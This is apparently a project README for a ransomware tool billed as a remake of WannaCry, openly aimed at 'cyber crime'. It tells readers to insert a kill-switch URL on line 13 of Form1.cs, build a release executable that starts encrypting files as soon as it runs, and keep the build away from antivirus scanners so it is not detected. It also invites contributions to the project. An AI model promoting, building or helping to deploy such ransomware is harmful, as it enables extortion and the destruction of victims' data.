Highly reliable, ransomware | More stars = More updates
About »
Report Bug
·
Request Feature
·
Send a Pull Request
Do not scan the client compiled exe with any antivirus software, or it will be detected and rendered useless!
Wannacry was a very malicious malware that attacked the world some time ago. It locked down computers, encrypted data and demanded ransom for its release. I decided to remake this masterpiece and bring it back into the world of cyber crime today.
- Open
Form1.cs
and head to line13
and replaceENTER_URL_HERE
with your kill switch url
string KILLSWITCH_Url = "ENTER_URL_HERE";
- Now you may build a release version (IF YOU RUN THE BUILT EXE IT WILL INSTANTLY START THE RANSOM PROCESS UNLESS THE KILLSWITCH URL IS ONLINE)
Make sure to read some of the comments since they are useful and could help out :)
Before starting 🏁, you are required to have Visual Studio 2019 - 2022 installed.
v3.0.0 ⋮ 2023-01-28
+ Initial release
Contributions, issues and feature requests are welcome!
Feel free to check
issues page.
Give a ⭐️ if this project helped you!